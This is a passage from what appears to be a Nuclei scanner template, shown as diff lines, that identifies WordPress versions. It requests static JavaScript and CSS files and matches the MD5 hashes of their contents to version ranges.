4.7 - 5.2.9 + dsl: + - "(\"802bee0e5f600483e0247f59b3b329b4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"95b069cef80307604eb843676b41da51\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5906907f0e17e15c5048fa1755739ac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/colorpicker.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"e186209dc41a59f2fb627c24e640712d\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.5.23 + dsl: + - "(\"58ab2fba61b092b0f4efe8aaa3b2864e\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"350af5af9077a62d67bae1f33a4f48fc\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"2d4c4e47b6dcb0ae0352459b3d7641c3\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"3086288f91098c51c719dc0e5874492c\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"3211fa8ad9b5ff52a438e30c3b7c2998\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"71131b3bc63bacef4c40b16235c5e735\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"b31d1b558c94797b5bc14d2ce6374178\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-backbone.min.js" + matchers: + - type: dsl + name: 4.5 - 5.2.9 + dsl: + - "(\"b978d3c20a25ca1d36c1688c298c8239\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"b569e29ff8fd482e0ee75e1494085621\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"355454f73b6cb8b46bac2dfbd1991b0a\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"aade6cd57d7e3565cbaa089fd3b0efe1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"643ca3336f29d3cab7ce9dd7da8bc2a6\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"a38ce053c5664bc2449c10f98d2d2917\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wpdialog.min.js" + matchers: + - type: dsl + name: 3.9 - 5.2.9 + dsl: + - "(\"d22d9fa5bb00ba0667080da846c4a1be\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f115cf2572a2a18ae56ec045f61abafe\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3d6e52f38f2de2ef4b50e3cd3d8cb53c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/hoverIntent.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"ca500ade854c31417faf5762e31b9d00\" == md5(body))" + - type: dsl + name: 3.7 - 4.1.32 + dsl: + - "(\"6f0074f1f2d119430222bc3c0950ac2f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c437e5d75778eae76b508b0a636f555c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e7b615fa36594e4ba18d0b71ca0b39c8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"fcaf34b14eacc973d37e9ab8c6ad6c65\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ab33227e56c7fcc9e1c626e910106cef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/zxcvbn-async.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.9 + dsl: + - "(\"3196e9b61f703909e139ce7e049a7ffd\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bf8ad109c3719269fdec077456a255e0\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"1ea3d35fc9ace7cd413a744524bf26c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-list-revisions.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"d252f431d400b696e25ca9fec9a1113e\" == md5(body))" + - type: dsl + name: 3.7 - 4.5.23 + dsl: + - "(\"b4031fcf4f4279be864d4bd82f7fc46c\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"a539afdba6c8cc71a580347083eee7d1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6bca22d5b17b85037767147333536b25\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"50907a74cc5046688748ec7910a806ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-util.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"83118aa939b5832dd4e1cad8b186012c\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"d099d4d6b145900b334fc3215ff55791\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.2.29 + dsl: + - "(\"39ca66318ef66201510aebcaad263210\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"f96c33819e26e9187e5d23bf2de399bc\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ed55a3ebb6ae3bb03f049538496a15b3\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d7d084f508f3d6965efc4be3bcfa255e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"12b99b14f0a718568e3e516f36bdb886\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-lists.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"7df18b42cbd5cbaa5067c06f57aa876b\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2a89454a1a6e55235a35d2fdb7e21288\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a255f1d03060ae5e5f8d6f1b6238c7b7\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"8802453513507186e7cff5316d83bc1e\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"98747c729c8e35d2d6781cc587d9d291\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"fe4f0bb44f6aa5584e2969665f2e6aa6\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"c7b59d9b7e2339b76708ccff21cfe930\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"df360a33e64d91258ff738d8ae445397\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"8193a9bc8e1d51b1945eaba9616971fe\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"359c22a08c86586f34c59a1f05bee149\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/word-count.min.js" + matchers: + - type: dsl + name: 4.3 - 5.2.9 + dsl: + - "(\"997f505fc9d24a27e4939641450e96a4\" == md5(body))" + - type: dsl + name: 3.8 - 4.2.29 + dsl: + - "(\"c71cccaeb645b4e75e963aecff2f5fc6\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5ecafe9ee88afb02ea468552f41c608d\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"bd315c9a2ccbf08260689037e63721ad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3bd992110e70a32eceff0c0243f33171\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"2de2fdb4605ef9fd1db104da6e1ef5ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/link.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.9 + dsl: + - "(\"f9ff4694933001933bdec2c133b2252d\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"58be56b4289c7fad06598d3d4d8ce1f8\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"03ef1e8b6d8670cd60cae80839934c69\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3c2b5fe432b3e74d2f0317612b6ad589\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"a8cbfa799d19910979e8703ed7498c5b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/language-chooser.min.js" + matchers: + - type: dsl + name: 4.0 - 5.2.9 + dsl: + - "(\"1d6822384a71090c74add106e4468581\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1e20e39aa9b8414f11608d62414ddd1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"376515a45db7b25e4a11f05bed321958\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-audio-widget.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.9 + dsl: + - "(\"ca37de8a34e673469901c4113e99d693\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cf2e2e5b78863f6c5bd85bbf4594dbc2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"30a021c3001e66ca247dfeff5695d387\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/accordion.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"226bc149fc7a1d2d56e4530d3b685e58\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"e97f90fda0240174382921696f5a7ebe\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"cfa0d94d00f7a8a147c3815dc819e114\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"7e21d082e2c0386ef6fe6571e7880e20\" == md5(body))" + - type: dsl + name: 3.7 - 3.9.33 + dsl: + - "(\"eb1fdf4f1d54234db56aaf3b979bb37f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ac7c461283eed11c59afbaf9557e6520\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"67459976d4b544d88025aacbcc5d922c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"65b4fed487bb9839510393b2a5c573d4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/svg-painter.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"a79aca561a5b87b62a710b0526a8e4bd\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.5.23 + dsl: + - "(\"8af3a4fbdca543699984d98cf95d1b03\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"8db7f2acb2c205b766167517ccce7f8a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"d149da3de567730515abb2a9a2570e8a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"000daef8be797700bf57756a191f0097\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c71153a1a202375d132936a337709e26\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-suggest.min.js" + matchers: + - type: dsl + name: 3.9 - 5.2.9 + dsl: + - "(\"e089545cd7fcde5c7cd70de3a70139e1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6ab5530d88daf1b8a2a1cf629868dcc9\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"77f81ca93899eaae1f67dbb695ead0e3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"846c3cc0ede47e280f7ed75066394d36\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"87209d46b9230db274cb2a463505b902\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d19dcca2d1e1ecc4564e339ada19f6c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7f5a63461a4870dcff29bcf63b6c9910\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"8e7a4405d35139f62871a539516679a1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"bbc4f3add6171c484f437bb1ffdc916d\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.2.9 + dsl: + - "(\"5d06470c0ac27ec77a1a6352f0558e35\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2b67f971fa55ec7f55b25c0af6f459a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"55297aab43dc737301324eac9dfed60d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-widgets.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"5b40ade72a4e6add4ec2147a58859a4b\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3451b304328c37c168f92f2dab48fcee\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b9b99fe065ec4736507c69be831a275c\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"05c7517e06bb14b5eaa336c261b99b81\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1193b5a24ea9327bbf3661c68b64cf80\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"a5f3b545a796e07e300f08d3c1e5386b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7c7901cd82ff1df1dbc556fe17d42024\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"a8a1e6df35c41ccb093b228d72cfd050\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-image-widget.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7906c28d01cc9fd1425457fcd672d1f0\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"b02a9bf568ddbf039eb477f8db40783c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5cdd681b80ed5519adb2c9607f04d23c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0806273a8f28ca374831208bc1444375\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-video-widget.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0ab80e738428314137a73a82460a87ae\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"b86c749b784acc5a8481b0888619234c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"186734538503669929e8d152100c2696\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d4a7e5ea513e162317f02081d00d2f4d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/code-editor.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3a55d10a30b356e96dd77cd870171558\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cc5081a21ab16c3e074aea785487432b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7e211c9b4b06d1d41fc28d88b3968d90\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-gallery-widget.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3fbbc0b9f61ddca152fa3847aba20581\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a8a1e7473d3a063c4e783d0bc44ec83d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d60c2db4e35e359b8a2816c93e768ea1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/xfn.min.js" + matchers: + - type: dsl + name: 3.8 - 4.9.5 + dsl: + - "(\"66b227ca28f41f2e0615b04a390d5e04\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5467d9418e2842e476e453fd741fdbc5\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f3b3ae0e44fefe8c9bbb517f24c1b9bd\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.2.9 + dsl: + - "(\"1b6f6842124166a08328aa7ad376027e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a8ec7c5389884c02249560b08ba149bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"294d8e8a6989bfc618c1f6ad7d3554e5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed.min.js" + matchers: + - type: dsl + name: 4.7 - 4.9.8 + dsl: + - "(\"5a03f97cc479b9f5d7efdaccec31bc17\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"687bf3104f17a2e9afced6d17acb384f\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.5.23 + dsl: + - "(\"0203f8b4d98102d02f6a569c40a47d7b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"2fb8dee3969a7597d0d892028e01cc2e\" == md5(body))" + - type: dsl + name: 4.9.9 - 5.2.9 + dsl: + - "(\"2dce40d16f9ff6332d3cbb7ae488a2b9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"04133d37cfd0f08267530b905a5ffff3\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"8ed6038a5dbf62380de72a681340afd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/underscore.min.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"6a3a434a1360cc744341e97de9177bc6\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"929daff1019e5493c0486bfb7a642e2e\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"252137d39d087bba598caf8cf94d2aec\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"4f76be3bf897efbc3c44acbcbe1f4947\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a8167cbe4acedc5f0132f7b087c24bd0\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"0bd7146b45c933ad9bfe210a41cd79b1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"dc95efbaca369dccfda71412431de555\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"039ca2cb0b64e4962638e527bb56e8d0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/utils.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"f6e3d57217de41fa3243331155452bb1\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"f4c1bfc14e78c5ccdcbdff37cd463733\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"41fa39bcefcede21b93beb099cfa78d7\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"06f830e4be5cac10b951ee7e59e43e39\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8b1224eaeca8bc3cddd4b9bcaab54802\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"284f0a2c317e3e094f08677e1b451c8a\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"b281e77e23b0bc3cc9c19cb36e7e6286\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c6fe48bca8ff16583cacfe347d4a6fd8\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"db523749051a987a9bf69e1dcc68c85a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/backbone.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"9263ddbe52f85e7be13301ac26889c8e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"198da1987a056bee56437d5bc3c9c176\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"88fee57a12be8ea719ed85fe29f062d3\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"6d6bc60cd42263c2ffd0b4b6523400c5\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"09622714468a28bca3cac046ee92d8f6\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"9f8b43fd1df78dca0827c73e29890865\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"710b5fe97d75f4305cd8dd472aae4132\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2781e10bd1b33dacb15e164e8a1e872e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"dcbe63759afdeb816d8ddc8a659d2764\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-upload.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"f320174ed63de275264dcf5430c309dc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e92fc3fab3c608da250c11fe97d96680\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"61ea709a3314ba200a885e2465267aa2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1131334fb18ce021bf24a79cf8030eeb\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6f56f6255bf7f1a228c15903bb652202\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"159be51feb8551297e0831216561c064\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"878d3eefdc8ff87d256f1231fd6e8d22\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"dc4728d88b26a69d23c41eea46362cdb\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3427781751e43fa30defb3c3686e0f4f\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"fd70aa581d90f2cf9f29ab3ed406e60a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a3d193608a06b479ec5ef684d6281897\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"49f0ad63a90d6cf3146aef5f705361ad\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"a138d6e9d8e9b3d4d2a9eafff00f5ee5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"952f708830650396ef92ebe8b1bfe4e5\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8bb04d6e7cb432209ea569d82301f14a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7cec3fb121b9608cfb8c6a089bdc1a78\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a4b28b10d15c63e0e9aacea727f2e954\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1a76cb6fbbeea2d6d2f777a9a68c3950\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f35e5a714f46d769b8dcb01fe6adf942\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a8fde8741e7a5eef99c890bcf80a1330\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fa3f72f6943c0ef9f20b7af1febddf4b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4e338ddee64e1284d5fc128c1d68d3ce\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"91fb0f195883f5a2160f8fbc3c972efc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1ce61fc960a92535e1df36b9406849cb\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"7dd2a79d285e607be1ac31534fa8c6f1\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"e9eb10161f31b6b7d1771ee567fc135b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2564cfc6fab696cf92ca7db8bf2bfc17\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"423dfcdad5293cfcebfa0ddeb2b61226\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7ab3411bcab95d99021791a7da6a39c8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a97de8b82ec8b15faf9b1d529d408527\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"770dc42adb777ab40a74fa6c5b23840c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e780700354f7e9e075448078b58814a9\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"13f8d82516b5553205c3be870508316b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"19e5373be67edc6a75533b48fb484b9f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d86d15f33703587a4af713132b2936be\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"19e9694fa284d071ca66669ad50ac87e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/zxcvbn.min.js" + matchers: + - type: dsl + name: 4.8 - 5.3.6 + dsl: + - "(\"a0ba2f2c8a1dd2594208e4f45b50b390\" == md5(body))" + - type: dsl + name: 3.8 - 4.7.19 + dsl: + - "(\"a14cd5113bd0d57563c1a9b63cae05f8\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"01bae5101bd40c4d24029dbfa20373d2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"027c098ebca6235056092f7b954dfc5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js" + matchers: + - type: dsl + name: 4.2 - 5.3.6 + dsl: + - "(\"640cbc0058638c4fb0400370dbcf25a3\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"dac11175ce0497c386f2ec1f2bb18983\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d120118d8ed5d92bfdec395da0e05a49\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0efc4bcc2e90416a5f996d9572236995\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js" + matchers: + - type: dsl + name: 3.9 - 5.3.6 + dsl: + - "(\"06f7aecb5bdfa28739eea0a498d15a81\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"04e5571b65e28e863f92fc4ee3f07414\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/plugin.js" + matchers: + - type: dsl + name: 4.4 - 5.3.6 + dsl: + - "(\"9d48345044e6111fbeb9d2fb444d5c49\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"b10eadbf41e88b236ac764bd26e653f9\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"4d37465e93855c2c01c9c60c6dda689c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c71b815f13d17651385fc624cd3fa490\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/langs/wp-langs-en.js" + matchers: + - type: dsl + name: 4.1 - 5.3.6 + dsl: + - "(\"08f8669f7453b17563a62e6bbb376137\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c1dbeecd27447d90fc2a188c58586ad3\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"260c1cc4baa6208fad1e01788c56e30b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7db3698995b52c5eccad285d5d790355\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1bade867eefc05658954aed300779c6d\" == md5(body))" + - type: dsl + name: 3.2 - 